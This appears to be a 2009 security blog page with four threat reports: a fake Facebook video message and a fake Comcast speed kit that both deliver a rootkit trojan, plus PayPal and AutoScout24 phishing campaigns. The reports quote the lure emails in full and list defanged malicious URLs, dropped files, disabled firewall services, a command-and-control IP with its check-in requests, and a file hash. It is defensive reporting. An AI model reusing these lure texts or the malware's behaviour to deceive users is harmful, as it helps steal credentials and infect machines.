Facebook message with link to striptease video leads to malware

March 19, 2009 Leave a Comment

A message from Facebook Mail with in the subject line “FaceBook message: Magnificent Striptease Dance (Last rated by Lorena Keyes)” contains an URL that leads to a host with malware.

Some alternative subjects are:

FaceBook message: Magnificent girl dancing video clip (Last rated by Sal Velasquez)
FaceBook message: Dancing Girl Drunk In The Pub- facebook Video (Last rated by Abe Bain)
FaceBook message: Hot Girl Dancing At Striptease Dance Party (Last rated by Lowell Clay)
FaceBook message: Dancing Girl Drunk In The Pub- facebook Video (Last rated by Shane Lucas)

The body of the email:

Messages from Your Friends on Facebook, March 19, 2009

You have 1 Personal Message:
Video title: “Amanda is dancing on Striptease Dance Party, March 14, 2009! We’re absolutely shocked!”.

Proceed to view full video message:

hxxp://facebook.shared.default.personalid-f58xc9cp8.launchpad.videosshared.com/home.htm?/efsonline/application=3l6mwjxsb1kpema

Message ID: FB-wtq2w9w5ig7z5gf
2009 Facebook community, Message Center.

The URL will lead to the Facebook look-a-like web site where the video is proposed.

From this page on you are required to download the newest Adobe Flash player. The file itself is presented as Flash_Adobe11.exe and is the same malware as in the Comcast High Speed Self Installation Kit malware posted earlier today.

The malware contains the Rootkit.Agent.EX that hides its presence in infected machine in order to perform malicious actions without user’s knowledge. A file %Windir%\9129837.ex,  %System%\abcdefg.bat and %Windir%\new_drv.sys (a hidden file) is being created on an infected machine.

A new hidden process 9129837.exe is started and the following system services are stopped on the computer: ALG (Application Layer Gateway Service), SharedAccess (Windows Firewall/Internet Connection Sharing), wscsvc (Security Center). The malware makes connection on the IP 58.65.232.17, server port 80, with one of the following GET requests:

cgi-bin/cmd.cgi?user_id=412227526&version_id=12&passphrase=fkjvhsdvlksdhvlsd
&socks=14477&version=125&crc=00000000

cgi-bin/options.cgi?user_id=412227526&version_id=12&passphrase=fkjvhsdvlksdhvlsd
&socks=14477&version=125&crc=00000000

Virus Total permalink and MD5: 8bf819ad4704aab758f86684a108c2a1.

Filed under Malware Tagged with , ,

PayPal 5 question survey is just another phishing technique

March 19, 2009 Leave a Comment

“PayPal will add $50 credit to your account just for taking part in our quick 5 question survey. Only one survey per card is allowed, if you own multiple cards you can run the survey again for each.”

This is the opening paragraph of a phishing site that tries to attract visitor to fill in the short survey with the promise of  receiving $50 on your PayPal account.

 

At the end of the survey you are ask to fill in your personal details including your credit card number, expiry date and card pin.

Some phishing sites don’t have any control features and accept any data that is submitted. When I tested their webform my credit card number didn’t match the required 16 digits and afterwards my card number appeared to be invalid. I’m not using real data of course. ;-)

So I went to the source code and I found a nice Javascript(s) that will verify your submitted data. When everything is submitted you’ll get a return screen.

As always, be carefull when receiving emails with URLs in that redirect you to sites that don’t fit the picture completely. In this case, the PayPal lay out of the webpage gives away that it is a phishing site and there is no secure https connection. Also, what’s more important, if PayPal was doing a survey you didn’t had to fill in your credit card details again.

Filed under Phishing Tagged with , ,

Comcast High Speed Self Installation Kit is malware

March 19, 2009 1 Comment

When checking some URLs at MX Lab this one caught our attention because it is a nice trick to distribute malware. The trick is to attract people that want high speed internet for free. Don’t we all want this? I believe so but this one isn’t going to offer you high speed internet at all.

The URL points to hxxp://comcast.corporate.history.userguide-csebfhah6.interstitialcontrol.43534online.com/highspeedinternet.html?/permissions/specialoffer=jt4uffle9qdyzzp.

The website starts with a very nice offer:

Attention All Customers: March 19, 2009

Comcast High Speed Self Installation Kit v.4 is a special utility designed to boost the speed of your connection. This tool has advanced features of the 3rd generation high speed internet with multiple connections , download scheduling, and many more. It is free proposition for all Comcast clients (any connection) for 300 days.

The instructions are very simple, download the file 36 kB big ComcastHSkit.exe. In most browsers the download is started after  a few seconds.

When submitting the file to Virus Total we got 6 engines of the 39 that detect this malware as TR/Crypt.FKM.Gen (Anti-Vir), Trojan.Crypt.FKM.Gen (McAffee GW Edition) or Mal/EncPk-HJ (Sophos).

The malware contains the Rootkit.Agent.EX that hides its presence in infected machine in order to perform malicious actions without user’s knowledge. A file %Windir%\9129837.ex,  %System%\abcdefg.bat and %Windir%\new_drv.sys (a hidden file) is being created on an infected machine.

A new hidden process 9129837.exe is started and the following system services are stopped on the computer: ALG (Application Layer Gateway Service), SharedAccess (Windows Firewall/Internet Connection Sharing), wscsvc (Security Center). The malware makes connection on the IP 58.65.232.17, server port 80, with one of the following GET requests:

cgi-bin/cmd.cgi?user_id=412227526&version_id=12&passphrase=fkjvhsdvlksdhvlsd
&socks=14477&version=125&crc=00000000

cgi-bin/options.cgi?user_id=412227526&version_id=12&passphrase=fkjvhsdvlksdhvlsd
&socks=14477&version=125&crc=00000000

According to other blog posts the IP 58.65.232.17 is involved in more malicious activities. The server has been reported relocated from the Ukraine to Hong Kong. Here are some articles:

http://www.f-secure.com/weblog/archives/00001625.html
http://garwarner.blogspot.com

Virus Total permalink and MD5: 8bf819ad4704aab758f86684a108c2a1.

Filed under Malware Tagged with , ,

AutoScout24 subject to phishing

March 19, 2009 1 Comment

Most of the time, when a phishing email is sent it has it’s goal set to obtain personal and financial information regarding your bank, PayPal or eBay. But sometimes phishers choose other targets as well. In this case it is AutoScout24.

At MX Lab we intercepted a few phishing emails today from “Autoscout24 <info@autoscout24.ch>”, which is obviously spoofed, with the subject “Autoscout24-Verkaeufer Informationen Haben Erfordert” and with the following content in the email body:

Aufmerksamkeit! 

Liebes Mitglied Autoscout24,

Wir haben kurzlich bemerkt, dass eine oder mehr Versuche in zu Ihrem autoscout24 Konto von einem auslandischen IP Adresse loggen.. 

Wenn Sie kurzlich auf Ihr Konto zugegriffen haben, wahrend Reisen, durfte der ungewohnliche Klotz in Versuchen von Ihnen eingeleitet worden sein. Jedoch, wenn Sie den Klotz in nicht eingeleitet haben, bitte Besuch autoscout24 sobald moglich, Ihre Identitat zu beglaubigen: 

hxxp://autoscot24-ch.info/home/index/login.asp/verify.html

Beglaubigt, dass Ihre Identitat ein Sicherheitsma©¬ ist, das sichern wird, dass Sie die einzige Person mit Zugriff auf das Konto sind. 

Dank fur Ihre Geduld, als wir zusammenarbeiten, Ihr Konto zu schutzen. 

Fur mehr Informationen sieht bitte den Verbindungsblasebalg:

http://about.autoscout24.com/de-de/au-company/au-company-agb/au-company-agb-as24.aspx

Mit freundlichen Gru©¬en, 
AutoScout24 Team,
AutoScout24 GmbH
Rosenheimer Str. 143 b
81671 Munchen

The message indicates that there is an issue with your account because AutoScout24 noticed login attempts from a foreign IP address. You have to login and verify your account to get your account unlocked again according to these instructions.

We did a test to see if the browsers phishing engines did detect the phishing site. Here are the results:

Safari 3 (MacOS X): yes
Firefox 3 (MacOS X): no

Firefox 3 (Windows): no
Internet Explorer 7 (Windows): no

Filed under Phishing Tagged with ,

Follow

Get every new post delivered to your Inbox.

Join 109 other followers